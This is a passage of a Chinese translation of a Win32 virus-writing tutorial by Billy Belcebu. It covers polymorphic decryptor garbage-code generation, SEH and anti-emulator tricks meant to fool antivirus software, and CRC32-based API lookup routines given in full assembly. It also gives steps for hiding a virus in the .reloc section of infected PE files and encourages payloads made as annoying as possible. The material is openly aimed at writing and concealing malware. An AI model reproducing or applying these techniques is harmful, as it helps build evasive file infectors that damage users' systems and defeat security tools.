- 产生现实代码,以合法的应用代码面目出现。例如,GriYo的引擎。
- 产生尽可能多的代码,以一个破坏的文件面目出现。例如,Mental Driller的 MeDriPoLen(看看 Squatter)。
Ok,让我们开始吧:
?两个的共同点:
- 用很多不同方式调用(调用中嵌调用再嵌调用...)
- 无条件的跳转
?现实主义:
一些现实的东西是那些看起来真实的东西,虽然它并不是。对于这个我打算解释如下:如果你看到大量的没有CALL和JUMP的代码你会怎么想?如果在一个CMP后面没有一个条件跳转你会怎么想?它几乎是不可能的,正如你,我和反病毒者知道的。所以我们必须有能力产生所有这些类型的垃圾结构:
- CMP/条件跳转
- TEST/条件跳转
- 如果对EAX处理,总是使用优化的指令
- 使用内存访问
- 产生 PUSH/垃圾/POP 结构
- 产生非常少的只要一个字节的代码(如果有)
?精神摧毁...恩...象破坏代码:
这个当解密程序充满了无意义的操作码看起来不像代码的时候发生,也就是说不符合以前列出来的规则的代码,而且使用协处理器的不做任何事情的指令,当然了,使用的操作码越多越好。
-=?-=?-=?-=?-=?-=?-=?-=?-=?-=?-=?-=?-=?-=?-=?-=?-=?-=?-=?
现在,我将试图解释代码产生的所有要点。首先,让我们以和它们相关的所有东西开始,CALL和无条件跳转。
?首先一点,CALL,它非常简单。你可以做成调用子例程,通过许多方式:
|Figure 1 -------| |Figure 2 -------| |Figure 3 -------|
| call @@1 | | jmp @@2 | | push @@2 |
| ... | | ... | | ... |
| jmp @@2 | |@@1: | |@@1: |
| ... | | ... | | ... |
|@@1: | | ret | | ret |
| ... | | ... | | ... |
| ret | |@@2: | |@@2: |
| ... | | ... | | ... |
|@@2: | | call @@1 | | call @@1 |
|________________| |________________| |________________|
当然你可以把所有的都混合起来,而且结果是,你有许多方式在一个解密程序内部编写一个子例程。而且,毫无疑问,你可以反过来(你将会听到我对它提更多的次数),而且可能在另外的CALL里有CALL,所有这些又在另外一个CALL里,然后另外一个...真的非常头疼。
此外,存储这些子例程的偏移并在产生的代码的任何地方调用它将是一个很好的选择。
?关于非条件跳转,它非常简单,因为我们不必要关心在jump之后知道jump的范围的指令,我们可以插入完全随机的操作码,比如垃圾...
-=?-=?-=?-=?-=?-=?-=?-=?-=?-=?-=?-=?-=?-=?-=?-=?-=?-=?-=?
现在,我打算代码中的现实主义。GriYo可以被称为这种类型的引擎的最伟大的代表;如果你看到了他的Marburg引擎, 或者他的HPS引擎,你将会意识到那个,虽然它的简易,他试图使得代码看起来尽可能真实,而且这个使得反病毒者在获得一个可靠的对付它的算法之前都快疯了。OK,让我们以一些基本要点开始:
?关于 ';CMP/条件 jump'; 结构,它相当清晰,因为你不放一个条件跳转,将从不会使用一个比较...OK,但是要编不是0跳转的jump,也就是说,在条件跳转和它应该跳转(或者不跳转)的偏移之间产生一些可执行的垃圾,而且在分析者的眼中,这些代码将更少地被怀疑。
?和TEST一样,但是使用JZ或者JNZ,因为正如你知道地,TEST仅仅会对zero flag有影响。
?最有可能制造失败的是AL/AX/EAX寄存器,因为它们有它们自己的优化代码。你将得到下面的指令的例子:
ADD, OR, ADC, SBB, AND, SUB, XOR, CMP 和 TEST (和寄存器很紧密).
?关于内存访问,一个好的选择是至少要获得被感染的PE文件的512字节数据,把它们放到病毒的某处,然后访问它们,读或协。试着使用除了简单的指数,双精度数,而如果你的大脑能接受它,试着使用双指数相乘,例如[ebp+esi*4]。并不是你想的那么困难,相信我。你还可以做一些内存移动,用MOVS指示,还可以使用STOS, LODS, CMPS...所有的字符串操作也可以使用。这就靠你了。
?PUSH/垃圾/POP结构非常有用,因为它的加到引擎中的简单,还因为好的效果,因为它在一个合法程序中是一个非常普通的结构。
?一个字节的指令的数量,如果太多了,会暴露我们的存在给反病毒者,或者给那些有着好奇的眼睛的家伙。考虑普通程序不是很正常使用它们,所以最好作一个检测来避免过多的使用它们,但是仍然每25字节使用一两个(我认为这是一个不错的比率)。
-=?-=?-=?-=?-=?-=?-=?-=?-=?-=?-=?-=?-=?-=?-=?-=?-=?-=?-=?
下面是一些精神摧毁型的东西:)
?你可以使用,例如,下面两个字节的协处理器指令是没有任何类型问题的垃圾:
f2xm1, fabs, fadd, faddp, fchs, fnclex, fcom, fcomp, fcompp, fcos, fdecstp,
fdiv, fdivp, fdivr, fdivrp, ffree, fincstp, fld1, fldl2t, fldl2e, fldpi,
fldln2, fldz, fmul, fmulp, fnclex, fnop, fpatan, fprem, fprem1, fptan,
frndint, fscale, fsin, fsincos, fsqrt, fst, fstp, fsub, fsubp, fsubr,fsubrp,
ftst, fucom, fucomp, fucompp, fxam, fxtract, fyl2x, fyl2xp1.
只要在病毒的开始放这两个指令来重置协处理器:
fwait
fninit
Mental Driller现在正偏向于现实主义了(据我所知)由他的最近的令人印象深刻的引擎(TUAREG),所以...
% 指令建立 %
~~~~~~~~~~~~~~
这大概是和多态相关的最重要的事情了:关系在相同指令和不同寄存器之间存在,或者在两个相同家族的指令之间存在。如果我们把指变成二进制的话它们之间的关系就非常清晰了。但是,因此,一些有用的信息:
寄存器二进制形式 | 000 001 010 011 100 101 110 111
| -------------------------------
Byte 寄存器 | AL CL DL BL AH CH DH BH
Word 寄存器 | AX CX DX BX SP BP SI DI
扩展寄存器 | EAX ECX EDX EBX ESP EBP ESI EDI
段 | ES CS SS DS FS GS -- --
MMX 寄存器 | MM0 MM1 MM2 MM3 MM4 MM5 MM6 MM7
我认为在写我的《Virus Writing Guides for MS-DOS》时候,所犯的大错误是在我的解释OpCodes 结构部分,和所有那些东西。这里我想要描述的是许多"你自己做",就像我在写一个多态引擎时那样。只以一个XOR操作码为例...
xor edx,12345678h -> 81 F2 78563412
xor esi,12345678h -> 81 F6 78563412
你看到了不同了吗?我习惯利用一个调试器,然后写我想要用一些寄存器构造代码,看看有什么改变。OK,正如你能看到的(嗨!你没瞎吧?),改变的字节是第二个。现在是有趣的部分了:把值变成二进制形式。
F2 -> 11 110 010
F6 -> 11 110 110
OK,你看到了什么改变了吗?最后3个bit,对吗?好了,现在到我把寄存器以二进制表示的部分:)正如你已经发现的,这3个bit根据寄存器的改变而改变了。所以...
010 -> EDX 寄存器
110 -> ESI 寄存器
只要试着把那3个比特赋其它的二进制值,你将会发现寄存器是怎么改变的。但是要小心...不要使用用这个操作码EAX值(000),因为,所有的算术指令,都对EAX优化了,因此要彻底地改变操作码。
所以,调试所有你想要的构造,看看它们之间的关系,并建立产生任何东西的可靠的代码。它非常简单!
% Recursivity %
~~~~~~~~~~~~~~~~~
它在你的多态引擎中是一个非常重要的一点。recursivity必须有一个限度,但是依赖于那个限度,代码可以非常难理解(如果那个限度很高)。让我们想象一些有一个所有垃圾代码构造器的偏移表:
PolyTable:
dd offset (GenerateMOV)
dd offset (GenerateCALL)
dd offset (GeneratteJMP)
[...]
EndPolyTable:
并想象一下你有在它们之中选择的如下例程:
GenGarbage:
mov eax,EndPolyTable-PolyTable
call r_range
lea ebx,[ebp+PolyTable]
mov eax,[ebx+eax*4]
add eax,ebp
call eax
ret
现在想象一下你的';GenerateCALL';指令从内部调用';GenGarbage';例程。呵呵';GenGarbage';可以再次调用';GenerateCALL';,并再次,然后再次(取决于RNG),所以你将有CALL在CALL中在CALL中...我已经在那件事情之前提了一个限度仅仅是为了避免速度问题,但是它可以用这些新的
';GenGarbage';例程来解决:
GenGarbage:
inc byte ptr [ebp+recursion_level]
cmp byte ptr [ebp+recursion_level],05 ; <- 5 is the recursion
jae GarbageExit ; level here!
mov eax,EndPolyTable-PolyTable
call r_range
lea ebx,[ebp+PolyTable]
mov eax,[ebx+eax*4]
add eax,ebp
call eax
GarbageExit:
dec byte ptr [ebp+recursion_level]
ret
所以,我们的引擎将能产生巨大数量的充满这种CALL的垃圾代码;)当然了,这个还可以在PUSH和POP间利用:)
%最后的话%
~~~~~~~~~~
多态性决定了编码,所以我不更多的讨论了。你应该自己做一个而不是复制代码。只要不是对经典引擎用一种类型的简单加密操作,和非常基础的垃圾如MOV,等等。使用你可以想到的所有主意。例如,有许多类型的CALL可做:3种风格(正如我以前描述的),此外,你可以建立堆栈结构,PUSHAD/POPAD,通过PUSH(然后是一个 RET x)来传送参数,还有更多的。要有想象力!
【高级Win32 技术】
~~~~~~~~~~~~~~~~~~
在这一章,我将讨论一些那些不需要一整章来讨论的技术,但是,不是很容易忘记的:)所以,下面我将讨论这些东西:
- Structured Exception Handler(SEH)
- MultiThreading(多线程)
- CRC32 (IT/ET)
- AntiEmulators(反模拟)
- Overwriting .reloc section(写.reloc节)
% Structured Exception Handler %
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
结构化异常处理(Structured Exception Handler),简称SEH,是所有Win32环境的一个非常酷的特点。它所做的非常容易理解:如果一个一般保护错误(简称GPF)发生了,控制会自动传到当前存在的SEH handler。你看到了它的辅助作用了吗?如果你把所有东西弄乱了,你将能够(仍然能)保持你的病毒没法被发现:)指向SEH handler的指针是在FS:[0000]中的。所以,你可以很容易地设置你自己的新SEH handler(但是要记住保存旧的!)如果一个错误发生了,控制将会传给你的SEH handler例程,但是堆栈将会混乱。幸运的是,Micro$oft已经在设置我们的SEH handler之前把堆栈放到ESP+8的地方了:)所以,简单的我们只要恢复它并把旧的SEH handler设置回去就可以了:)让我们看看一个SEH使用的一个简单例子:
;--------从这里开始剪切-------------------------------------------------------
.386p
.model flat ; Good good... 32 bit r0x0r
extrn MessageBoxA:PROC ; Defined APIs
extrn ExitProcess:PROC
.data
szTitle db "Structured Exception Handler [SEH]",0
szMessage db "Intercepted General Protection Fault!",0
.code
start:
push offset exception_handler ; Push our exception handler
; offset
push dword ptr fs:[0000h] ;
mov dword ptr fs:[0000h],esp
errorhandler:
mov esp,[esp+8] ; Put the original SEH offset
; Error gives us old ESP
; in [ESP+8]
pop dword ptr fs:[0000h] ; Restore old SEH handler
push 1010h ; Parameters for MessageBoxA
push offset szTitle
push offset szMessage
push 00h
call MessageBoxA ; Show message :]
push 00h
call ExitProcess ; Exit Application
setupSEH:
xor eax,eax ; Generate an exception
div eax
end start
;--------到这里为止剪切-------------------------------------------------------
正如在"Win32反调试"那一章所看到的,除此之外SEH还有另外一个特色:)它愚弄了大多数应用级的调试器。为了使你的设置一个新的SEH handler更简单,这里你可以用一些宏来做做这个(hi,Jacky!):
; Put SEH - Sets a new SEH handler
pseh macro what2do
local @@over_seh_handler
call @@over_seh_handler
mov esp,[esp+08h]
what2do
@@over_seh_handler:
xor edx,edx
push dword ptr fs:[edx]
mov dword ptr fs:[edx],esp
endm
; Restore SEH - Restore old SEH handler
rseh macro
xor edx,edx
pop dword ptr fs:[edx]
pop edx
endm
它的用法非常简单。例如:
pseh
div edx
push 00h
call ExitProcess
SEH_handler:
rseh
[...]
下面的代码,如果执行了,将会在';rseh';宏之后继续,而不是终止进程。清楚了吗?:)
%多线程%
~~~~~~~~
当我被告知这个可以在Win32环境很容易实现的时候,在我的脑海中的是许多它的用处:执行代码而其它的代码(也是我们病毒的)也在执行是一个美梦,因为你节约了时间:)
一个多任务的过程的主要算法是:
1.创建你想要运行的相关线程的代码
2.在父进程的代码中等待子进程结束
这个看起来很难,但是有两个API可以救我们。它们的名字:CreateThread 和 WaitForSingleObject。让我们看看Win32 API列表关于这两个API是怎么说的...
----------------------------------------
CreateThread函数在调用进程的地址空间中创建一个线程执行。
HANDLE CreateThread(
LPSECURITY_ATTRIBUTES lpThreadAttributes, // ptr to thread security attrs
DWORD dwStackSize, // initial thread stack size, in bytes
LPTHREAD_START_ROUTINE lpStartAddress, // pointer to thread function
LPVOID lpParameter, // argument for new thread
DWORD dwCreationFlags, // creation flags
LPDWORD lpThreadId // pointer to returned thread identifier
);
参数
====
?lpThreadAttributes:指向一个确定返回句柄可以由子进程继承的SECURITY_ATTRIBUTES结构。如果lpThreadAttributes是NULL,这个句柄不 能被继承。
Windows NT: 这个结构的lpSecurityDescriptor成员指定新线程的安全描述。如果lpThreadAttributes是NULL,这个线程获得一个缺省安全 描述。
Windows 95: 这个结构的lpSecurityDescriptor成员被忽略了。
?dwStackSize: 以字节数指定新线程的堆栈大小。如果指定了0,堆栈的大小缺省的和进程的主线程的堆栈大小一样。堆栈是在进程的内存空 间中自动开辟的,并在线程终止的时候释放。注意如果需要的话,堆栈大小会增加。CreateThread试图把由dwStackSize指定 的大小提交字节数,如果大小超过了可利用的内存的话,就会失败。
?lpStartAddress:新线程的开始地址。这个通常是一个用WINAPI调用惯例声明的函数,这个函数接受一个32-bit的指针的参数,并返回一个32-bit的退出码。它的原型是:
DWORD WINAPI ThreadFunc( LPVOID );
?lpParameter: 指定一个传给线程的32-bit的参数。
?dwCreationFlags:指定控制线程创建的额外标志。如果CREATE_SUSPENDED标志被指定了,线程将以一个挂起状态创建,除非ResumeThread函数调用,将不会运行。如果这个值是0,线程在创建之后立即运行。这次,没有其它的支持的值。
?lpThreadId: 指向一个接受线程标志的32bit变量。
返回值
======
?如果函数成功了,返回值是一个新线程的句柄。
?如果函数失败了,返回值是NULL。为了获得详细的错误信息,调用GetLastError。
Windows 95: CreateThread仅仅是在一个32-bit的上下文中的时候才成功。一个32-bit DLL不能创建一个额外的线程,当那个DLL正在被一个16-bit程序调用的时候。
----------------------------------------
WaitForSingleObject函数当如下的情况发生的时候返回:
?指定的对象在signaled状态。
?过期间隔逝去了。
DWORD WaitForSingleObject(
HANDLE hHandle, // handle of object to wait for
DWORD dwMilliseconds // time-out interval in milliseconds
);
参数
====
?hHandle:识别对象。对一个对象类型的列表,它的句柄可以指定,看看接下来的评论。
Windows NT:句柄必须有SYNCHRONIZE访问。想知道更多的信息,看看Access Masks and Access Rights(访问标志和访问权限)。
?dwMilliseconds: 指定过期间隔,以毫秒形式。如果间隔过了,甚至对象的状态是nonsignaled,这个函数就返回。如果dwMilliseconds是0,这个函数就测试对象的状态并立即返回。如果dwMilliseconds是INFINITE这个函数从不会过期。
返回值
======
?如果函数成功了,返回值表明了导致函数返回的事件。
?如果函数失败了,返回值是WAIT_FAILED。为了获得详细的错误信息,调用GetLastError。
----------------------------------------
如果这个对你来说还不够,或者你不懂试图解释给你听的子句的话,下面给出一个多线程的ASM例子。
;-------从这里开始剪切------------------------------------------------------
.586p
.model flat
extrn CreateThread:PROC
extrn WaitForSingleObject:PROC
extrn MessageBoxA:PROC
extrn ExitProcess:PROC
.data
tit1 db "Parent Process",0
msg1 db "Spread your wings and fly away...",0
tit2 db "Child Process",0
msg2 db "Billy';s awesome bullshit!",0
lpParameter dd 00000000h
lpThreadId dd 00000000h
.code
multitask:
push offset lpThreadId ; lpThreadId
push 00h ; dwCreationFlags
push offset lpParameter ; lpParameter
push offset child_process ; lpStartAddress
push 00h ; dwStackSize
push 00h ; lpThreadAttributes
call CreateThread
; EAX = Thread handle
push 00h ; ';Parent Process'; blah blah
push offset tit1
push offset msg1
push 00h
call MessageBoxA
push 0FFh ; Wait infinite seconds
push eax ; Handle to wait (thread)
call WaitForSingleObject
push 00h ; Exit program
call ExitProcess
child_process:
push 00h ; ';Child Process'; blah blah
push offset tit2
push offset msg2
push 00h
call MessageBoxA
ret
end multitask
;-------到这里为止剪切------------------------------------------------------
如果你测试上述代码,你将会发现,如果你单击了在子进程中的';Accept';按钮,那么你将不得不去单击在父进程中的';Accept';按钮。是不是很有意思呀?如果父进程死了,所有相关的线程和它一起死了,但是不过子进程死了,父进程还仍然存活者。
所以看到你可以通过父进程和子进程通过WaitForSingleObject控制两个进程相当有趣。想象一下可能性:在目录里搜索一个特定文件(如MIRC.INI)同时你在产生一个多态解密程序,并解包余下的东西...哇! ;)
看看Benny的关于Threads 和 Fibers (29A#4)的教程。
% CRC32 (IT/ET) %
~~~~~~~~~~~~~~~~~~~
好了,我们都知道(我希望是这样)怎么编写一个API搜索引擎...它相当简单,而且你有许多教程选择(JHB的, Lord Julus的,和这篇教程...),只要得到一个,并学习它。但是,正如你意识到的,API地址占(让我们说浪费)了你的病毒的许多字节。如果你想要编写一个小病毒,该怎么解决这个问题呢?
解决方法:CRC32
我相信GriYo是第一个使用这个技术的人,在它的令人印象深刻的 Win32.Parvo病毒中(源代码还没有公布)。它不是搜索一个确定数量和我们代码中API名字相符的字节,而是获得所有的API名,一个接一个,并得到它们的CRC32值,把它和我们搜索的API的CRC32值。如果它是等价的,那么我们必须总是要处理。Ok,ok...首先,你需要一些获取CRC32值的代码:)让我们用Zhengxi的代码,首先由Vecna重新组合了,最终由我重新组合了(优化了一些字节) ;)
;------从这里开始剪切--------------------------------------------------------
;
; CRC32 procedure
; ===============
;
; input:
; ESI = Offset where code to calculate begins
; EDI = Size of that code
; output:
; EAX = CRC32 ofgiven code
;
CRC32 proc
cld
xor ecx,ecx ; Optimized by me - 2 bytes
dec ecx ; less
mov edx,ecx
NextByteCRC:
xor eax,eax
xor ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
NextBitCRC:
shr bx,1
rcr ax,1
jnc NoCRC
xor ax,08320h
xor bx,0EDB8h
NoCRC: dec dh
jnz NextBitCRC
xor ecx,eax
xor edx,ebx
dec edi ; 1 byte less
jnz NextByteCRC
not edx
not ecx
mov eax,edx
rol eax,16
mov ax,cx
ret
CRC32 endp
;------到这里为止剪切--------------------------------------------------------
我们现在知道怎么获得一个指定的字符串或代码的CRC32值了,但是在这里你在期望另外一件事情...呵呵呵,耶!你在等待API搜索引擎的代码 :)
;------从这里开始剪切--------------------------------------------------------
;
; GetAPI_ET_CRC32 procedure
; =========================
; 呵,很难的名字?这个函数在KERNEL32的输出表中搜索一个API名字(改变一点点将会
; 使它对任何DLL有用),但是仅仅需要API的CRC32值,不是全字符串:)还需要一个就像
; 我在上面给出的获取CRC32的例程。
;
; input:
; EAX = CRC32 of the API ASCIIz name
; output:
; EAX = API address
;
GetAPI_ET_CRC32 proc
xor edx,edx
xchg eax,edx ; Put CRC32 of da api in EDX
mov word ptr [ebp+Counter],ax ; Reset counter
mov esi,3Ch
add esi,[ebp+kernel] ; Get PE header of KERNEL32
lodsw
add eax,[ebp+kernel] ; Normalize
mov esi,[eax+78h] ; Get a pointer to its
add esi,1Ch ; Export Table
add esi,[ebp+kernel]
lea edi,[ebp+AddressTableVA] ; Pointer to the address table
lodsd ; Get AddressTable value
add eax,[ebp+kernel] ; Normalize
stosd ; And store in its variable
lodsd ; Get NameTable value
add eax,[ebp+kernel] ; Normalize
push eax ; Put it in stack
stosd ; Store in its variable
lodsd ; Get OrdinalTable value
add eax,[ebp+kernel] ; Normalize
stosd ; Store
pop esi ; ESI = NameTable VA
@?_3: push esi ; Save again
lodsd ; Get pointer to an API name
add eax,[ebp+kernel] ; Normalize
xchg edi,eax ; Store ptr in EDI
mov ebx,edi ; And in EBX
push edi ; Save EDI
xor al,al ; Reach the null character
scasb ; that marks us the end of
jnz $-1 ; the api name
pop esi ; ESI = Pointer to API Name
sub edi,ebx ; EDI = API Name size
push edx ; Save API';s CRC32
call CRC32 ; Get actual api';s CRC32
pop edx ; Restore API';s CRC32
cmp edx,eax ; Are them equal?
jz @?_4 ; if yes, we got it
pop esi ; Restore ptr to api name
add esi,4 ; Get the next
inc word ptr [ebp+Counter] ; And increase the counter
jmp @?_3 ; Get another api!
@?_4:
pop esi ; Remove shit from stack
movzx eax,word ptr [ebp+Counter] ; AX = Counter
shl eax,1 ; *2 (it';s an array of words)
add eax,dword ptr [ebp+OrdinalTableVA] ; Normalize
xor esi,esi ; Clear ESI
xchg eax,esi ; ESI = Ptr 2 ordinal; EAX = 0
lodsw ; Get ordinal in AX
shl eax,2 ; And with it we go to the
add eax,dword ptr [ebp+AddressTableVA] ; AddressTable (array of
xchg esi,eax ; dwords)
lodsd ; Get Address of API RVA
add eax,[ebp+kernel] ; and normalize!! That';s it!
ret
GetAPI_ET_CRC32 endp
AddressTableVA dd 00000000h ;\
NameTableVA dd 00000000h ; > IN THIS ORDER!!
OrdinalTableVA dd 00000000h ;/
kernel dd 0BFF70000h ; Adapt it to your needs ;)
Counter dw 0000h
;------到这里为止剪切--------------------------------------------------------
下面是等价的代码,但是现在为了操作Import Table,因此使得你能够仅仅用这些API的CRC32就可以编一个Per-Process驻留病毒;)
;------从这里开始剪切--------------------------------------------------------
;
; GetAPI_IT_CRC32 procedure
; =========================
;
; 这个函数将在Import Table中搜索和传给例程的CRC32值相符的API。这个对编写一个
; Per-Process驻留病毒有用(看看这篇教程的"Per-Process residence"一章)。
;
; input:
; EAX = CRC32 of the API ASCIIz name
; output:
; EAX = API address
; EBX = Pointer to the API address in the Import Table
; CF = Set if routine failed
;
GetAPI_IT_CRC32 proc
mov dword ptr [ebp+TempGA_IT1],eax ; Save API CRC32 for later
mov esi,dword ptr [ebp+imagebase] ; ESI = imagebase
add esi,3Ch ; Get ptr to PE header
lodsw ; AX = That pointer
cwde ; Clear MSW of EAX
add eax,dword ptr [ebp+imagebase] ; Normalize pointer
xchg esi,eax ; ESI = Such pointer
lodsd ; Get DWORD
cmp eax,"EP" ; Is there the PE mark?
jnz nopes ; Fail... duh!
add esi,7Ch ; ESI = PE header+80h
lodsd ; Look for .idata
push eax
lodsd ; Get size
mov ecx,eax
pop esi
add esi,dword ptr [ebp+imagebase] ; Normalize
SearchK32:
push esi ; Save ESI in stack
mov esi,[esi+0Ch] ; ESI = Ptr to name
add esi,dword ptr [ebp+imagebase] ; Normalize
lea edi,[ebp+K32_DLL] ; Ptr to ';KERNEL32.dll';
mov ecx,K32_Size ; Size of string
cld ; Clear direction flag
push ecx ; Save ECX
rep cmpsb ; Compare bytes
pop ecx ; Restore ECX
pop esi ; Restore ESI
jz gotcha ; Was it equal? d#amn...
add esi,14h ; Get another field
jmp SearchK32 ; And search again
gotcha:
cmp byte ptr [esi],00h ; Is OriginalFirstThunk 0?
jz nopes ; d#amn if so...
mov edx,[esi+10h] ; Get FirstThunk
add edx,dword ptr [ebp+imagebase] ; Normalize
lodsd ; Get it
or eax,eax ; Is it 0?
jz nopes ; d#amn...
xchg edx,eax ; Get pointer to it
add edx,[ebp+imagebase]
xor ebx,ebx
loopy:
cmp dword ptr [edx+00h],00h ; Last RVA?
jz nopes ; d#amn...
cmp byte ptr [edx+03h],80h ; Ordinal?
jz reloop ; d#amn...
mov edi,[edx] ; Get pointer of an imported
add edi,dword ptr [ebp+imagebase] ; API
inc edi
inc edi
mov esi,edi ; ESI = EDI
pushad ; Save all regs
eosz_edi ; Get end of string in EDI
sub edi,esi ; EDI = API size
call CRC32
mov [esp+18h],eax ; Result in ECX after POPAD
popad
cmp dword ptr [ebp+TempGA_IT1],ecx ; Is the CRC32 of this API
jz wegotit ; equal as the one we want?
reloop:
inc ebx ; If not, loop and search for
add edx,4 ; another API in the IT
loop loopy
wegotit:
shl ebx,2 ; Multiply per 4
add ebx,eax ; Add FirstThunk
mov eax,[ebx] ; EAX = API address
test al,00h ; Overlap: avoid STC :)
org $-1
nopes:
stc
ret
GetAPI_IT_CRC32 endp
TempGA_IT1 dd 00000000h
imagebase dd 00400000h
K32_DLL db "KERNEL32.dll",0
K32_Size equ $-offset K32_DLL
;------到这里为止剪切--------------------------------------------------------
Happy?耶,它令人震惊而且它很简单!而且,毫无疑问,如果你的病毒没有加密,你可以避免使用者的怀疑,因为没有明显的API名字:)好了,我将列出一些API的CRC32值(包括API结束的NULL字符),但是,如果你想要使用其它的API而不是我将要列在这里的API,我将再放一个小程序,能给你一个ASCII字符串的CRC32值。
一些API的CRC32:
API name CRC32 API name CRC32
-------- ----- -------- -----
CreateFileA 08C892DDFh CloseHandle 068624A9Dh
FindFirstFileA 0AE17EBEFh FindNextFileA 0AA700106h
FindClose 0C200BE21h CreateFileMappingA 096B2D96Ch
GetModuleHandleA 082B618D4h GetProcAddress 0FFC97C1Fh
MapViewOfFile 0797B49ECh UnmapViewOfFile 094524B42h
GetFileAttributesA 0C633D3DEh SetFileAttributesA 03C19E536h
ExitProcess 040F57181h SetFilePointer 085859D42h
SetEndOfFile 059994ED6h DeleteFileA 0DE256FDEh
GetCurrentDirectoryA 0EBC6C18Bh SetCurrentDirectoryA 0B2DBD7DCh
GetWindowsDirectoryA 0FE248274h GetSystemDirectoryA 0593AE7CEh
LoadLibraryA 04134D1ADh GetSystemTime 075B7EBE8h
CreateThread 019F33607h WaitForSingleObject 0D4540229h
ExitThread 0058F9201h GetTickCount 0613FD7BAh
FreeLibrary 0AFDF191Fh WriteFile 021777793h
GlobalAlloc 083A353C3h GlobalFree 05CDF6B6Ah
GetFileSize 0EF7D811Bh ReadFile 054D8615Ah
GetCurrentProcess 003690E66h GetPriorityClass 0A7D0D775h
SetPriorityClass 0C38969C7h FindWindowA 085AB3323h
PostMessageA 086678A04h MessageBoxA 0D8556CF7h
RegCreateKeyExA 02C822198h RegSetValueExA 05B9EC9C6h
MoveFileA 02308923Fh CopyFileA 05BD05DB1h
GetFullPathNameA 08F48B20Dh WinExec 028452C4Fh
CreateProcessA 0267E0B05h _lopen 0F2F886E3h
MoveFileExA 03BE43958h CopyFileExA 0953F2B64h
OpenFile 068D8FC46h
你还想要其它的API吗?
你有可能需要知道其它API名字的CRC32值,所以这里我将给出小而有效的用来帮助我自己的程序,我希望对你也有帮助。
;------从这里开始剪切--------------------------------------------------------
.586
.model flat
.data
extrn ExitProcess:PROC
extrn MessageBoxA:PROC
extrn GetCommandLineA:PROC
titulo db "GetCRC32 by Billy Belcebu/iKX",0
message db "SetEndOfFile" ; Put here the string you
; want to know its CRC32
_ db 0
db "CRC32 is "
crc32_ db "00000000",0
.code
test:
mov edi,_-message
lea esi,message ; Load pointer to API name
call CRC32 ; Get its CRC32
lea edi,crc32_ ; Transform hex to text
call HexWrite32
mov _," " ; make 0 to be an space
push 00000000h ; Display message box with
push offset titulo ; the API name and its CRC32
push offset message
push 00000000h
call MessageBoxA
push 00000000h
call ExitProcess
HexWrite8 proc ; This code has been taken
mov ah,al ; from the 1st generation
and al,0Fh ; host of Bizatch
shr ah,4
or ax,3030h
xchg al,ah
cmp ah,39h
ja @@4
@@1:
cmp al,39h
ja @@3
@@2:
stosw
ret
@@3:
sub al,30h
add al,';A'; - 10
jmp @@2
@@4:
sub ah,30h
add ah,';A'; - 10
jmp @@1
HexWrite8 endp
HexWrite16 proc
push ax
xchg al,ah
call HexWrite8
pop ax
call HexWrite8
ret
HexWrite16 endp
HexWrite32 proc
push eax
shr eax, 16
call HexWrite16
pop eax
call HexWrite16
ret
HexWrite32 endp
CRC32 proc
cld
xor ecx,ecx ; Optimized by me - 2 bytes
dec ecx ; less
mov edx,ecx
NextByteCRC:
xor eax,eax
xor ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
NextBitCRC:
shr bx,1
rcr ax,1
jnc NoCRC
xor ax,08320h
xor bx,0EDB8h
NoCRC: dec dh
jnz NextBitCRC
xor ecx,eax
xor edx,ebx
dec edi ; 1 byte less
jnz NextByteCRC
not edx
not ecx
mov eax,edx
rol eax,16
mov ax,cx
ret
CRC32 endp
end test
;------到这里为止剪切--------------------------------------------------------
Cool,哈? :)
%反模拟(AntiEmulators)%
~~~~~~~~~~~~~~~~~~~~~~~
正如在这篇文档的许多地方,这个小章节是由Super和我合作的。这里将会有一些东西的列表,肯定会愚弄反病毒模拟系统的,一些小的调试器也不例外。Enjoy!
- 用SEH产生错误。例子:
pseh
dec byte ptr [edx] ; <-- or another exception, such as ';div edx';
[...] <-- if we are here, we are being emulated!
virus_code:
rseh
[...] <-- the virus code :)
- 使用 CS 段前缀。 例子:
jmp cs:[shit]
call cs:[shit]
- 使用 RETF。例子:
push cs
call shit
retf
- 玩玩 DS. 例子:
push ds
pop eax
或者甚至更好:
push ds
pop ax
或者更好:
mov eax,ds
push eax
pop ds
- 用 PUSH CS/POP REG 招检测 NODiCE 模拟 :
mov ebx,esp
push cs
pop eax
cmp esp,ebx
jne nod_ice_detected
- 使用无正式文档的操作码:
salc ; db 0D6h
bpice ; db 0F1h
- 使用 Threads and/or Fibers.
我希望所有这些东西将对你有用 :)
% 写.reloc 节 %
~~~~~~~~~~~~~~~~~~~
这是一个非常有意思的东西。如果PE文件的ImageBase因为某种原因改变了,但是不是总会发生的(99.9%),';.reloc';就非常有用了,但不是必须的。而且';.reloc';节通常非常巨大,所以为什么不使用它来存储我们的病毒呢?我建议你读读b0z0在Xine#3上的教程,叫做"Ideas and theoryes on PE infection",因为它提供给我们许多有意思的信息。好了,如果你想知道该怎样写.reloc节的话,只要按照如下:
+ 在节头中:
1. 把病毒的大小+它的堆赋给新的VirtualSize
2. 把对齐后的VirtualSize赋给新的SizeOfRawData
3. 清除 PointerToRelocations 和 NumberOfRelocations
4. 改变 .reloc 名字为另外一个
+ 在PE头中:
1. 清除 offset A0h (RVA to fixup table)
2. 清除 offset A4h (Size of such table)
病毒的入口将会是节的VirtualAddress。它还有时候,隐蔽的(stealthy),因为有时候大小不增长(在不是很大的病毒中),因为relocs通常非常巨大。
【附录1:发作】
因为我们是在一个图形化的操作系统下工作的,我们的的发作可以更加令人印象深刻。毫无疑问,我不愿更多的象CIH和Kriz病毒那样的发作。只要看看Marburg,HPS,Sexy2,Hatred,PoshKiller,Harrier,和许多其它的病毒。它们真正令人震惊。当然了,还要看看有着多个发作的病毒,如Girigat和Thorin.
只要想想,除非你给用户显示你的发作,用户是不会注意病毒的存在的。所以,你将要给出的情形是你工作的结晶。如果你的发作太垃圾了,你的病毒看起来也会很垃圾:)
有许多事情可做:你可以改掉墙纸,你可以改掉字符串(就象我的Legacy),你可以给他显示主页,你可以在Ring-0下做些幽雅的东西(就象Sexy2和PoshKiller),等等。只要对一些Win32 API研究一下。试着把发作编得越恼人越好:)
【附录2:关于作者】
